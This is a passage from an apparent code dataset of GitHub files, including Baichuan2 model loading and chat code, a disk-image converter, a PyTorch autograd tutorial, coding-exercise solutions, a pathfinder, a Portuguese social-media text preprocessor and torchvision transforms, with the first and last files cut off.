get_output_embeddings(self):\n return self.lm_head\n\n def set_output_embeddings(self, new_embeddings):\n self.lm_head = new_embeddings\n\n def set_decoder(self, decoder):\n self.model = decoder\n\n def get_decoder(self):\n return self.model\n \n @classmethod\n def from_pretrained(\n cls,\n pretrained_model_name_or_path: Optional[Union[str, os.PathLike]],\n *model_args,\n config: Optional[Union[PretrainedConfig, str, os.PathLike]] = None,\n cache_dir: Optional[Union[str, os.PathLike]] = None,\n ignore_mismatched_sizes: bool = False,\n force_download: bool = False,\n local_files_only: bool = False,\n token: Optional[Union[str, bool]] = None,\n revision: str = \"main\",\n use_safetensors: bool = None,\n **kwargs,\n ):\n \n # Load config if we don't provide a configuration\n if not isinstance(config, PretrainedConfig):\n config_path = config if config is not None else pretrained_model_name_or_path\n config, model_kwargs = cls.config_class.from_pretrained(\n config_path,\n cache_dir=cache_dir,\n return_unused_kwargs=True,\n force_download=force_download,\n resume_download=False,\n proxies=None,\n local_files_only=local_files_only,\n token=token,\n revision=revision,\n subfolder=\"\",\n _from_auto=False,\n _from_pipeline=None,\n **kwargs,\n )\n else:\n model_kwargs = kwargs\n\n method = getattr(config, \"quantization_method\", \"cpm\")\n if method == \"bnb\" and getattr(config, \"quantization_config\",None) and config.quantization_config['load_in_4bit']:\n try:\n from .quantizer import init_model_weight_int4\n from accelerate import init_empty_weights, dispatch_model, infer_auto_device_map\n from accelerate.utils import CustomDtype\n from accelerate.utils import get_balanced_memory\n except ImportError:\n raise ImportError(f\"Needs import model weight init func to run quantize.\") \n # Instantiate model.\n init_contexts = [no_init_weights(_enable=True)]\n init_contexts.append(init_empty_weights())\n with ContextManagers(init_contexts):\n model = cls(config)\n\n def load_model_from_multiple_files(input_dir):\n state_dict = {}\n for file_name in glob.iglob(f\"{input_dir}/pytorch_model*.bin\"):\n chunk_state_dict = torch.load(file_name, map_location='cpu')\n state_dict.update(chunk_state_dict)\n return state_dict\n\n # model_file = os.path.join(pretrained_model_name_or_path, 'pytorch_model.bin')\n # state_dict = torch.load(model_file, map_location=\"cpu\")\n state_dict = load_model_from_multiple_files(pretrained_model_name_or_path)\n model.is_quantized = True\n \n device_map = kwargs.pop(\"device_map\", None)\n torch_dtype = kwargs.pop(\"torch_dtype\", None)\n if device_map is not None:\n kwargs = {\"no_split_module_classes\": model._no_split_modules}\n target_dtype = CustomDtype.INT4\n max_memory = get_balanced_memory(\n model,\n dtype=target_dtype,\n low_zero=(device_map == \"balanced_low_0\"),\n max_memory=None,\n **kwargs,\n )\n kwargs[\"max_memory\"] = max_memory\n device_map = infer_auto_device_map(model, dtype=target_dtype, **kwargs)\n model = init_model_weight_int4(config, model, state_dict)\n \n # Set model in evaluation mode to deactivate DropOut modules by default\n model.eval()\n # If it is a model with generation capabilities, attempt to load the generation config\n if model.can_generate():\n try:\n model.generation_config = GenerationConfig.from_pretrained(\n pretrained_model_name_or_path,\n cache_dir=cache_dir,\n force_download=force_download,\n resume_download=False,\n proxies=None,\n local_files_only=local_files_only,\n token=token,\n revision=revision,\n subfolder=\"\",\n _from_auto=False,\n _from_pipeline=None,\n **kwargs,\n )\n except (OSError, TypeError):\n logger.info(\n \"Generation config file not found, using a generation config created from the model config.\"\n )\n pass\n \n if device_map is not None:\n dispatch_model(model, device_map=device_map)\n \n return model\n\n return super(BaichuanForCausalLM, cls).from_pretrained(pretrained_model_name_or_path, *model_args, \n config=config, cache_dir=cache_dir, ignore_mismatched_sizes=ignore_mismatched_sizes, \n force_download=force_download, local_files_only=local_files_only, token=token, revision=revision, \n use_safetensors=use_safetensors, **kwargs)\n\n def forward(\n self,\n input_ids: torch.LongTensor = None,\n attention_mask: Optional[torch.Tensor] = None,\n past_key_values: Optional[List[torch.FloatTensor]] = None,\n inputs_embeds: Optional[torch.FloatTensor] = None,\n labels: Optional[torch.LongTensor] = None,\n use_cache: Optional[bool] = None,\n output_attentions: Optional[bool] = False,\n output_hidden_states: Optional[bool] = False,\n return_dict: Optional[bool] = True,\n **kwargs,\n ) -> Union[Tuple, CausalLMOutputWithPast]:\n return_dict = (\n return_dict if return_dict is not None else self.config.use_return_dict\n )\n\n # decoder outputs consists of (dec_features, layer_state, dec_hidden, dec_attn)\n outputs = self.model(\n input_ids=input_ids,\n attention_mask=attention_mask,\n past_key_values=past_key_values,\n inputs_embeds=inputs_embeds,\n use_cache=use_cache,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n return_dict=return_dict,\n )\n\n hidden_states = outputs[0]\n logits = self.lm_head(hidden_states)\n loss = None\n if labels is not None:\n # Shift so that tokens < n predict n\n shift_logits = logits[..., :-1, :].contiguous()\n shift_labels = labels[..., 1:].contiguous()\n # Flatten the tokens\n loss_fct = CrossEntropyLoss()\n shift_logits = shift_logits.view(-1, self.config.vocab_size)\n shift_labels = shift_labels.view(-1)\n softmax_normalizer = shift_logits.max(-1).values ** 2\n z_loss = self.config.z_loss_weight * softmax_normalizer.mean()\n # Enable model parallelism\n shift_labels = shift_labels.to(shift_logits.device)\n loss = loss_fct(shift_logits, shift_labels) + z_loss\n\n if not return_dict:\n output = (logits,) + outputs[1:]\n return (loss,) + output if loss is not None else output\n\n return CausalLMOutputWithPast(\n loss=loss,\n logits=logits,\n past_key_values=outputs.past_key_values,\n hidden_states=outputs.hidden_states,\n attentions=outputs.attentions,\n )\n\n def quantize_bnb(self, bits: int):\n try:\n from .quantizer import quantize_online\n except ImportError:\n raise ImportError(f\"Needs QLinear to run quantize.\")\n return quantize_online(self, bits)\n\n def quantize(self, bits: int, empty_init=False, device=None, **kwarg):\n if bits == 0:\n return\n from .quantization import quantize\n if self.quantized:\n logger.info(\"Already quantized.\")\n return self\n quantize(self, bits=bits, empty_init=empty_init, device=device, **kwarg)\n self.config.quantization_bit = bits\n self.quantized = True\n return self\n\n \n def prepare_inputs_for_generation(\n self,\n input_ids: torch.LongTensor,\n past_key_values: Optional[torch.Tensor] = None,\n attention_mask: Optional[torch.Tensor] = None,\n inputs_embeds: Optional[torch.Tensor] = None,\n **kwargs,\n ):\n if past_key_values:\n input_ids = input_ids[:, -1:]\n\n # if `inputs_embeds` are passed, we only want to use them in the 1st generation step\n if inputs_embeds is not None and past_key_values is None:\n model_inputs = {\"inputs_embeds\": inputs_embeds}\n else:\n model_inputs = {\"input_ids\": input_ids}\n\n model_inputs.update(\n {\n \"past_key_values\": past_key_values,\n \"use_cache\": kwargs.get(\"use_cache\"),\n \"attention_mask\": attention_mask,\n }\n )\n return model_inputs\n\n @staticmethod\n def _reorder_cache(past_key_values, beam_idx):\n return tuple(\n tuple(past_state.index_select(0, beam_idx) for past_state in layer_past)\n for layer_past in past_key_values\n )\n\n def _build_chat_input(\n self, tokenizer, messages: List[dict], max_new_tokens: int = 0\n ):\n max_new_tokens = max_new_tokens or self.generation_config.max_new_tokens\n max_input_tokens = self.config.model_max_length - max_new_tokens\n max_input_tokens = max(self.config.model_max_length // 2, max_input_tokens)\n total_input, round_input = [], []\n for i, message in enumerate(messages[::-1]):\n content_tokens = tokenizer.encode(message[\"content\"])\n if message[\"role\"] == \"user\":\n round_input = (\n [self.generation_config.user_token_id]\n + content_tokens\n + round_input\n )\n if (\n total_input\n and len(total_input) + len(round_input) > max_input_tokens\n ):\n break\n else:\n total_input = round_input + total_input\n if len(total_input) >= max_input_tokens:\n break\n else:\n round_input = []\n elif message[\"role\"] == \"assistant\":\n round_input = (\n [self.generation_config.assistant_token_id]\n + content_tokens\n + [self.generation_config.eos_token_id]\n + round_input\n )\n else:\n raise ValueError(f\"message role not supported yet: {message['role']}\")\n total_input = total_input[-max_input_tokens:] # truncate left\n total_input.append(self.generation_config.assistant_token_id)\n total_input = torch.LongTensor([total_input]).to(self.device)\n return total_input\n\n def chat(self, tokenizer, messages: List[dict], stream=False,\n generation_config: Optional[GenerationConfig]=None,**kwargs):\n generation_config = generation_config or self.generation_config\n input_ids = build_chat_input(self, tokenizer, messages, generation_config.max_new_tokens)\n if stream:\n streamer = TextIterStreamer(tokenizer, skip_prompt=True, skip_special_tokens=True)\n Thread(target=self.generate, kwargs=dict(\n inputs=input_ids, streamer=streamer,\n generation_config=generation_config,**kwargs\n )).start()\n return streamer\n else:\n outputs = self.generate(input_ids, generation_config=generation_config,**kwargs)\n response = tokenizer.decode(outputs[0][len(input_ids[0]):], skip_special_tokens=True)\n return response\n","repo_name":"ssbuild/deep_training","sub_path":"src/deep_training/nlp/models/baichuan2_13b/modeling_baichuan.py","file_name":"modeling_baichuan.py","file_ext":"py","file_size_in_byte":38357,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"32"} +{"seq_id":"6250420136","text":"import sys\n\ndef read_dim_file(dim_name):\n with open(dim_name, \"rb\") as f:\n xdf_bytes = bytearray()\n header_bytes = f.read(0x100)\n if header_bytes[0xab:0xaf] != bytes('DIFC',encoding='utf-8'):\n print(\"not DIM format (dim_name)\")\n return None\n if header_bytes[0] != 0:\n print(\"unknown format.\")\n return None\n for i in range(154):\n n = header_bytes[i+1]\n if (n > 0):\n xdf_bytes += f.read(0x2000)\n else:\n xdf_bytes += bytes([0]*0x2000)\n return xdf_bytes\n\ndef write_xdf_image(xdf_name, xdf_bytes):\n if len(xdf_bytes) != 154 * 0x2000:\n print(\"not XDF image.\")\n return\n with open(xdf_name, \"wb\") as f:\n f.write(xdf_bytes)\n\ndef main():\n if len(sys.argv) < 3:\n print(\"usage: dim2xdf \")\n return 1\n\n xdf_bytes = read_dim_file(sys.argv[1])\n if xdf_bytes != None:\n write_xdf_image(sys.argv[2],xdf_bytes)\n\nif __name__ == \"__main__\":\n main()","repo_name":"tantanGH/dim2xdf","sub_path":"dim2xdf/dim2xdf.py","file_name":"dim2xdf.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"9242383294","text":"# So far, just like we did in autograd.py, we have implemented\n# the computational graph and made each operation to do\n# forward pass and backward pass. (I wrote this)\n\n# Each primitive autograd operator is really two functions\n# that operate on Tensors, forward and backward function.\n# We can easily define our own autograd operator by defining\n# a subclass of torch.autograd.Function. We can then use\n# our new autograd operator by constructiing an instance\n# and calling it like a function, passing Variables containing\n# input data.\nimport torch\nfrom torch.autograd import Variable\n\nclass MyReLU(torch.autograd.Function):\n \"\"\"\n We can implement our own custom autograd Functions by subclassing\n torch.autograd.Function and impelmenting the forward and backward passes\n which operate on Tensors.\n \"\"\"\n def forward(self, input):\n\n self.save_for_backward(input)\n return input.clamp(min=0)\n\n def backward(self, grad_output):\n\n # , only applies to a vector of the shape (1,n) to make the vector (n,1)\n # Note! , does not apply to the vector of the shape (n,1) or any other shape.\n input, = self.saved_tensors\n\n # Tensor.clone() returns a copy of the tensor.\n # Note it is not Variable.clone()\n grad_input = grad_output.clone()\n grad_input[input < 0] = 0\n return grad_input\n\nN, D_in, H, D_out = 64, 1000, 100, 10\n\n# Create random Tensors to hold input and outputs, and wrap them in Variables.\nx = Variable(torch.randn(N, D_in), requires_grad=False)\ny = Variable(torch.randn(N, D_out), requires_grad=False)\n\n# Create random Tensors for weights, and wrap them in Variables.\nw1 = Variable(torch.randn(D_in, H), requires_grad=True)\nw2 = Variable(torch.randn(H, D_out), requires_grad=True)\n\nlearning_rate = 1e-6\n\nfor t in range(500):\n # Construct an instance of our MyReLU class to use in our network\n relu = MyReLU()\n\n # Forward pass: compute predicted y using operations on Variables; we compute\n # ReLU using our custom autograd operation.\n y_pred = relu(x.mm(w1)).mm(w2)\n\n # Compute and print loss\n loss = (y_pred - y).pow(2).sum()\n print(t, loss.data[0])\n\n # Use autograd to compute the backward pass.\n loss.backward()\n\n # Update weights using gradient descent\n w1.data -= learning_rate * w1.grad.data\n w2.data -= learning_rate * w2.grad.data\n\n # Manually zero the gradients after updating weights\n w1.grad.data.zero_()\n w2.grad.data.zero_()\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"perryhow13/PyTorch-Tutorials","sub_path":"LeariningPyTorchWithExamples/define_new_auto_func.py","file_name":"define_new_auto_func.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74606594652","text":"class Solution:\n def matrixScore(self, A: List[List[int]]) -> int:\n M, N = len(A), len(A[0])\n res = (1 << N - 1) * M\n for j in range(1, N):\n cur = 0\n for i in range(M):\n if A[i][j] == A[i][0]:\n cur += 1\n # print(A[i], j, i)\n # print(A[i][j], A[i][0], cur)\n # cur = sum(A[i][j] == A[i][0] for i in range(M))\n res += max(cur, M - cur) * (1 << N - 1 - j)\n print(cur, M-cur, (1 << N-1-j))\n return res","repo_name":"kevinjshah2207/LeetCode_Summer_21","sub_path":"score-after-flipping-matrix/score-after-flipping-matrix.py","file_name":"score-after-flipping-matrix.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"24283558646","text":"import random\nimport re\nimport discord\n\nimport jb2.command\nimport jb2.embed\n\n\nclass AskCommand(jb2.command.Command):\n def __init__(self, connector):\n with open('res/text/odpowiedzi.txt') as file:\n self.answers = file.readlines()\n\n def get_pattern(self):\n return r'ask( .+)?$'\n\n async def action(self, prefix, message, client):\n msg = message.content.strip()\n author_m = message.author.mention\n pattern = self.get_full_pattern(prefix)\n\n question = re.match(\"^\" + pattern, msg).group(1)\n\n if question is None:\n text = \"Potrzebny parametr: **question**\"\n emb = jb2.embed.error_embed(author_m, text)\n else:\n emoji = \":8ball:\"\n emb = jb2.embed.embed(emoji, author_m, random.choice(self.answers))\n emb.colour = 0x007777\n\n await client.send_message(message.channel, embed=emb)\n","repo_name":"spirdon/janbot2","sub_path":"jb2/text/ask.py","file_name":"ask.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71073494812","text":"#!/bin/python3\n\nimport sys\n\norde = ord(\"a\") - 1\ns = input().strip()\ntab = set()\ntmp = 0\nfor a in s:\n if (a != tmp):\n tmp = a\n lena = 1\n tab.add(ord(a) - orde)\n else:\n lena +=1\n tab.add(lena * (ord(a) - orde))\nn = int(input().strip())\nfor a0 in range(n):\n x = int(input().strip())\n print(\"Yes\" if (x in tab) else \"No\")\n","repo_name":"lvoneduval/hackerrank","sub_path":"Algorithms/Strings/07_Weighted_Uniform_Strings.py","file_name":"07_Weighted_Uniform_Strings.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1973363077","text":"import pygame\nfrom newBoard import *\n\n\nclass PathFinder:\n def __init__(self, Board, start, end) -> None:\n self.tree = []\n self.closedList = []\n self.finalPath = []\n self.board = Board\n self.start = start # Should be the index of the pieces list \n self.end = end # Should also be the index of the pieces list. \n \n pass\n\n def checkPositions(self):\n # Define the start and end indecies of the movable pieces\n moves = {\n 1 : (1, 43),\n 2 : (3, 45),\n 3 : (5, 47),\n\n 4 : (13, 7),\n 5 : (27, 21),\n 6 : (41, 35),\n\n 7 : (47, 5),\n 8 : (45, 3),\n 9 : (43, 1),\n\n 10 : (35, 41),\n 11 : (21 ,27),\n 12 : (7, 13)\n }\n\n \n pass\n\n\n def checkNode(self):\n \n self.tree.append((self.board.piecesList[self.start], None))\n self.closedList.append(self.start)\n parentIndex = 0\n for node, pIndex in self.tree:\n if node.index == self.end:\n print (\"Goal has been found\")\n return True\n \n # Get the pieces that the player can move to from the current position\n pieceAbove, pieceRight, pieceBelow, pieceLeft = self.get4piecesAround(node.index)\n \n # The orientation to look at \n # # 0 # # 0 #\n # 3 # 1 3 # 1\n # # 2 # # 2 #\n \n # # 0 # # 0 #\n # 3 # 1 3 # 1\n # # 2 # # 2 #\n \n # Look up \n if pieceAbove is not None:\n if pieceAbove.orientation[2] == 1 and node.orientation[0] == 1:\n if not self.inClosedList(pieceAbove.index): \n self.tree.append((pieceAbove, parentIndex))\n self.closedList.append(pieceAbove.index)\n\n # Look down \n if pieceBelow is not None:\n if pieceBelow.orientation[0] == 1 and node.orientation[2] == 1:\n if not self.inClosedList(pieceBelow.index): \n self.tree.append((pieceBelow, parentIndex))\n self.closedList.append(pieceBelow.index)\n \n # Look right\n if pieceRight is not None:\n if pieceRight.orientation[3] == 1 and node.orientation[1] == 1:\n if not self.inClosedList(pieceRight.index): \n self.tree.append((pieceRight, parentIndex))\n self.closedList.append(pieceRight.index)\n\n # Look left\n if pieceLeft is not None:\n if pieceLeft.orientation[1] == 1 and node.orientation[3] == 1:\n if not self.inClosedList(pieceLeft.index): \n self.tree.append((pieceLeft, parentIndex))\n self.closedList.append(pieceLeft.index)\n \n parentIndex += 1\n print (\"Could not find goal\")\n return False\n \n\n def inClosedList(self, index):\n for i in self.closedList:\n if i == index:\n return True\n return False \n \n def getPath(self):\n idx = 0\n for i in range(len(self.tree) - 1, 0, - 1):\n if self.tree[i][0].index == self.end: \n idx = self.tree[i][1]\n self.finalPath.append(self.tree[i][0])\n break\n \n # for piece, parent in self.tree:\n # print (\"Piece position = \" + str(piece.position) + \", parent index: \" + str(parent) + \", index: \" + str(piece.index))\n\n while idx is not None:\n self.finalPath.append(self.tree[idx][0])\n idx = self.tree[idx][1]\n pass\n\n # for piece in self.finalPath:\n # print (piece.index)\n\n def drawPath(self, display):\n for i in range (len (self.finalPath) - 1):\n startpos = self.finalPath[i].position[0] + int(DEFAULT_IMAGE_SIZE[0] / 2), self.finalPath[i].position[1] + int(DEFAULT_IMAGE_SIZE[1] / 2)\n endpos = self.finalPath[i + 1].position[0] + int(DEFAULT_IMAGE_SIZE[0] / 2), self.finalPath[i + 1].position[1] + int(DEFAULT_IMAGE_SIZE[1] / 2)\n pygame.draw.line(display, (255,0,0), startpos, endpos, 4)\n\n def get4piecesAround(self, index):\n above = self.board.piecesList[index - 7] if index > 6 else None \n rightSide = self.board.piecesList[index + 1] if index % 7 < 6 else None\n below = self.board.piecesList[index + 7] if index < 42 else None\n leftSide = self.board.piecesList[index - 1] if index % 7 > 0 else None \n return above, rightSide, below, leftSide","repo_name":"pater18/Labyrinth-AI","sub_path":"newPathFinder.py","file_name":"newPathFinder.py","file_ext":"py","file_size_in_byte":4795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30891102488","text":"from collections import OrderedDict\n\nfrom rest_framework.pagination import LimitOffsetPagination\nfrom rest_framework.response import Response\n\n\nclass ApplicationListPagination(LimitOffsetPagination):\n \"\"\"应用列表分页器,用于添加各种应用类型数量等参数\"\"\"\n\n default_limit = 12\n\n def get_paginated_response(self, data, extra_data):\n return Response(\n OrderedDict(\n [\n ('count', self.count),\n ('next', self.get_next_link()),\n ('previous', self.get_previous_link()),\n ('extra_data', extra_data),\n ('results', data),\n ]\n )\n )\n","repo_name":"TencentBlueKing/blueking-paas","sub_path":"apiserver/paasng/paasng/platform/applications/pagination.py","file_name":"pagination.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"32"} +{"seq_id":"72950111451","text":"#coding: utf-8 \n# livia_miraanda\nfrom datetime import datetime\nfrom nltk.stem.snowball import SnowballStemmer\nimport json,re,nltk,gzip,string,unicodedata,time\n\n#===============================================================================\n# excecao desenvolvida para ser lancada quando um post nao tiver mensagem textual\n#===============================================================================\nclass PostWithoutMessageException(Exception):\n pass\n\n#===============================================================================\n# remove urls\n#===============================================================================\ndef remove_url(text):\n return re.sub(r\"http\\S+\", \"\", text)\n\n#===============================================================================\n# remove numeros no texto\n#===============================================================================\ndef remove_numbers(text):\n return re.sub(r'\\d+','',text)\n\n#===============================================================================\n# tokeniza o texto - 'hello world' return ['hello','world']\n#===============================================================================\ndef tokenization(text):\n return nltk.word_tokenize(text)\n\n#===============================================================================\n# converte o texto para minusculo\n#===============================================================================\ndef convert_to_lower(text):\n return text.lower()\n\n#===============================================================================\n# obter o stemming de uma lista de palavras tokenizadas\n#===============================================================================\ndef obtain_stemming(tokenized_pre_processed_message):\n stemmer = SnowballStemmer('portuguese')\n tokenized_stemmed_text = [stemmer.stem(word) for word in tokenized_pre_processed_message]\n return tokenized_stemmed_text\n\n#===============================================================================\n# remove todos simbolos dentro da lista string.punctuation\n#===============================================================================\ndef remove_symbols(tokenized_pre_processed_message):\n # ponctuations less [\\] because unicode patterns\n ponctuations = string.punctuation.replace('[\\]','')\n new_words = []\n for word in tokenized_pre_processed_message:\n new_word = ''.join([letter for letter \n in word if letter not in ponctuations])\n if new_word != '':\n new_words.append(new_word)\n return new_words \n\n#===============================================================================\n# remover stop words\n#===============================================================================\ndef replace_stop_words(tokenized_pre_processed_message):\n stop_words = [get_unicode_normalized(word) for word in nltk.corpus.stopwords.words('portuguese')]\n stop_words.append('link')\n stop_words.append('youtube')\n stop_words.append('sobre')\n processed_text = [word for word in tokenized_pre_processed_message\n if word not in stop_words]\n return processed_text\n\n#===============================================================================\n# substituir todos /n dentro de um texto por um espaco em branco\n#===============================================================================\ndef replace_break_lines(text):\n return text.replace('\\n', ' ')\n\n\n#===============================================================================\n# substituir todas as , dentro de um texto por um espaco em branco\n#===============================================================================\ndef replace_commas(text):\n return text.replace(',', ' ')\n\n#===============================================================================\n# funcao para chamar todas as funcoes intermediarias do pre-processamento \n#===============================================================================\ndef complete_pre_process_message(message):\n pre_processed_message = remove_url(message)\n pre_processed_message = get_unicode_normalized(pre_processed_message)\n pre_processed_message = convert_to_lower(pre_processed_message)\n pre_processed_message = replace_break_lines(pre_processed_message)\n pre_processed_message = remove_numbers(pre_processed_message)\n tokenized_pre_processed_message = tokenization(pre_processed_message)\n tokenized_pre_processed_message = replace_stop_words(tokenized_pre_processed_message)\n tokenized_pre_processed_message = remove_symbols(tokenized_pre_processed_message)\n #tokenized_pre_processed_message = obtain_stemming(tokenized_pre_processed_message)\n return tokenized_pre_processed_message\n\n#===============================================================================\n# funcao para chamar algumas funcoes intermediarias do pre-processamento \n#===============================================================================\ndef partial_pre_process_message(message):\n pre_processed_message = get_unicode_normalized(message)\n pre_processed_message = replace_commas(pre_processed_message)\n pre_processed_message = convert_to_lower(pre_processed_message)\n pre_processed_message = replace_break_lines(pre_processed_message)\n tokenized_pre_processed_message = tokenization(pre_processed_message)\n return tokenized_pre_processed_message\n\n#===============================================================================\n# retorna a lista com os posts do path passado como parametro\n #==============================================================================\ndef get_list_posts_from_path(posts_file_path):\n with gzip.open(posts_file_path) as post_file:\n post_list = post_file.readlines()\n return post_list\n\n#===============================================================================\n# normaliza os textos removendo caracteres nao ascii\n#===============================================================================\ndef get_unicode_normalized(text):\n return unicodedata.normalize('NFKD', text).encode('ascii', 'ignore').decode('utf8')\n\n#===============================================================================\n# retorna lista com o par chave/valor de menssagens pre-processadas\n#===============================================================================\ndef generate_list_pre_processed_posts(post_list):\n pre_processed_post_list = []\n for post in post_list:\n try:\n if not isinstance(post,dict):\n dict_post = json.loads(post)\n if not 'message' in dict_post.keys() or dict_post['message'] =='':\n raise PostWithoutMessageException('this post does not have message')\n message = dict_post[\"message\"]\n dict_post[\"pre_processed_message\"] = complete_pre_process_message(message)\n dict_post['message_min_processed'] = partial_pre_process_message(message)\n dict_post['has_textual_message'] = True\n pre_processed_post_list.append(dict_post)\n except PostWithoutMessageException as err:\n dict_post['has_textual_message'] = False\n dict_post[\"pre_processed_message\"] = ' '\n dict_post['message_min_processed'] = ' '\n pre_processed_post_list.append(dict_post)\n return pre_processed_post_list\n\n#===============================================================================\n# converte list para str - ['hello','world'] -> 'hello world'\n#===============================================================================\ndef join_tokenized_message(tokenized_message):\n if tokenized_message == None:\n return None\n elif tokenized_message == []:\n return ' '\n else:\n message_str = ' '\n message_str = message_str.join(tokenized_message)\n return message_str\n\n\ndef write_list_in_csv_file(pre_processed_post_list,output_file,facebook_page):\n with open(output_file, 'wt') as file:\n file.write('created_time,id,pre_processed_message,message_min_processed,shares,status_type,full_picture,reactions_like,reactions_haha,reactions_wow,reactions_sad,reactions_angry,reactions_love,has_textual_message,author\\n')\n for processed_post in pre_processed_post_list:\n file.write('{0},{1},{2},{3},{4},{5},{6},{7},{8},{9},{10},{11},{12},{13},{14}\\n'\n .format(str(processed_post['created_time']),\n str(processed_post['id']),\n str(join_tokenized_message(processed_post['pre_processed_message'])),\n str(join_tokenized_message(processed_post['message_min_processed'])),\n str(processed_post['shares']['count'] if ('shares' in processed_post) else 0),\n str(processed_post['status_type']),\n str(processed_post['full_picture'] if ('full_picture' in processed_post) else None),\n str(processed_post['reactions_like']['summary']['total_count']),\n str(processed_post['reactions_haha']['summary']['total_count']),\n str(processed_post['reactions_wow']['summary']['total_count']),\n str(processed_post['reactions_sad']['summary']['total_count']),\n str(processed_post['reactions_angry']['summary']['total_count']),\n str(processed_post['reactions_love']['summary']['total_count']),\n str(processed_post['has_textual_message']),\n str(facebook_page)\n )\n )\n\ndef main():\n \n #===============================================================================\n # coloque o caminho do diretorio do projeto\n #===============================================================================\n destinaton_path = '/home/lucas/UFOP/ple_2020/analise_midias_sociais/final-work'\n data_path = '{0}/data'.format(destinaton_path)\n\n facebook_pages = ['haddad','bolsonaro','ciro','amoedo','alckmin','marina','boulos']\n\n for facebook_page in facebook_pages:\n print('\\nprocess post: {0} \\n'.format(str(facebook_page)))\n\n posts_file_path = '{0}/{1}/all_posts.json.gz'.format(data_path, facebook_page)\n output_posts_file_path = '{0}/all_pp_posts_{1}.csv'.format(data_path, facebook_page)\n\n post_list = get_list_posts_from_path(posts_file_path)\n pre_processed_post_list = generate_list_pre_processed_posts(post_list)\n write_list_in_csv_file(pre_processed_post_list,output_posts_file_path,facebook_page)\n\n #===========================================================================\n # final logs\n #===========================================================================\n print('process finished\\n')\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"LucasPereiraMiranda/topic-modeling","sub_path":"source/python_scripts/process_posts.py","file_name":"process_posts.py","file_ext":"py","file_size_in_byte":10804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17994755595","text":"import math\nimport numbers\nimport warnings\nfrom typing import Any, cast, Dict, List, Optional, Sequence, Tuple, Type, Union\n\nimport PIL.Image\nimport torch\nfrom torchvision.ops.boxes import box_iou\nfrom torchvision.prototype import features\nfrom torchvision.prototype.transforms import functional as F, InterpolationMode, Transform\nfrom torchvision.transforms.functional import _get_perspective_coeffs\n\nfrom typing_extensions import Literal\n\nfrom ._transform import _RandomApplyTransform\nfrom ._utils import (\n _check_padding_arg,\n _check_padding_mode_arg,\n _check_sequence_input,\n _setup_angle,\n _setup_fill_arg,\n _setup_float_or_seq,\n _setup_size,\n has_all,\n has_any,\n query_bounding_box,\n query_spatial_size,\n)\n\n\nclass RandomHorizontalFlip(_RandomApplyTransform):\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n return F.horizontal_flip(inpt)\n\n\nclass RandomVerticalFlip(_RandomApplyTransform):\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n return F.vertical_flip(inpt)\n\n\nclass Resize(Transform):\n def __init__(\n self,\n size: Union[int, Sequence[int]],\n interpolation: InterpolationMode = InterpolationMode.BILINEAR,\n max_size: Optional[int] = None,\n antialias: Optional[bool] = None,\n ) -> None:\n super().__init__()\n\n self.size = (\n [size]\n if isinstance(size, int)\n else _setup_size(size, error_msg=\"Please provide only two dimensions (h, w) for size.\")\n )\n self.interpolation = interpolation\n self.max_size = max_size\n self.antialias = antialias\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n return F.resize(\n inpt,\n self.size,\n interpolation=self.interpolation,\n max_size=self.max_size,\n antialias=self.antialias,\n )\n\n\nclass CenterCrop(Transform):\n def __init__(self, size: Union[int, Sequence[int]]):\n super().__init__()\n self.size = _setup_size(size, error_msg=\"Please provide only two dimensions (h, w) for size.\")\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n return F.center_crop(inpt, output_size=self.size)\n\n\nclass RandomResizedCrop(Transform):\n def __init__(\n self,\n size: Union[int, Sequence[int]],\n scale: Tuple[float, float] = (0.08, 1.0),\n ratio: Tuple[float, float] = (3.0 / 4.0, 4.0 / 3.0),\n interpolation: InterpolationMode = InterpolationMode.BILINEAR,\n antialias: Optional[bool] = None,\n ) -> None:\n super().__init__()\n self.size = _setup_size(size, error_msg=\"Please provide only two dimensions (h, w) for size.\")\n\n if not isinstance(scale, Sequence):\n raise TypeError(\"Scale should be a sequence\")\n scale = cast(Tuple[float, float], scale)\n if not isinstance(ratio, Sequence):\n raise TypeError(\"Ratio should be a sequence\")\n ratio = cast(Tuple[float, float], ratio)\n if (scale[0] > scale[1]) or (ratio[0] > ratio[1]):\n warnings.warn(\"Scale and ratio should be of kind (min, max)\")\n\n self.scale = scale\n self.ratio = ratio\n self.interpolation = interpolation\n self.antialias = antialias\n\n self._log_ratio = torch.log(torch.tensor(self.ratio))\n\n def _get_params(self, flat_inputs: List[Any]) -> Dict[str, Any]:\n height, width = query_spatial_size(flat_inputs)\n area = height * width\n\n log_ratio = self._log_ratio\n for _ in range(10):\n target_area = area * torch.empty(1).uniform_(self.scale[0], self.scale[1]).item()\n aspect_ratio = torch.exp(\n torch.empty(1).uniform_(\n log_ratio[0], # type: ignore[arg-type]\n log_ratio[1], # type: ignore[arg-type]\n )\n ).item()\n\n w = int(round(math.sqrt(target_area * aspect_ratio)))\n h = int(round(math.sqrt(target_area / aspect_ratio)))\n\n if 0 < w <= width and 0 < h <= height:\n i = torch.randint(0, height - h + 1, size=(1,)).item()\n j = torch.randint(0, width - w + 1, size=(1,)).item()\n break\n else:\n # Fallback to central 